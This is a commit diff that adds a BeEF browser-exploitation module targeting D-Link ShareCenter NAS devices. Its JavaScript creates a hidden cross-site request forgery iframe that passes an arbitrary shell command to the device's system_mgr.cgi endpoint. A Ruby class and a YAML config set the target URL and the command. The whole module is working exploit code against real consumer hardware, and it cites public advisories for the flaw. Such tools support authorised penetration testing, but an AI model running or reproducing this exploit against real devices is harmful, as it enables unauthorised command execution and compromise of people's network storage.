Add D-Link ShareCenter command execution exploit module

modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js

@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]

modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end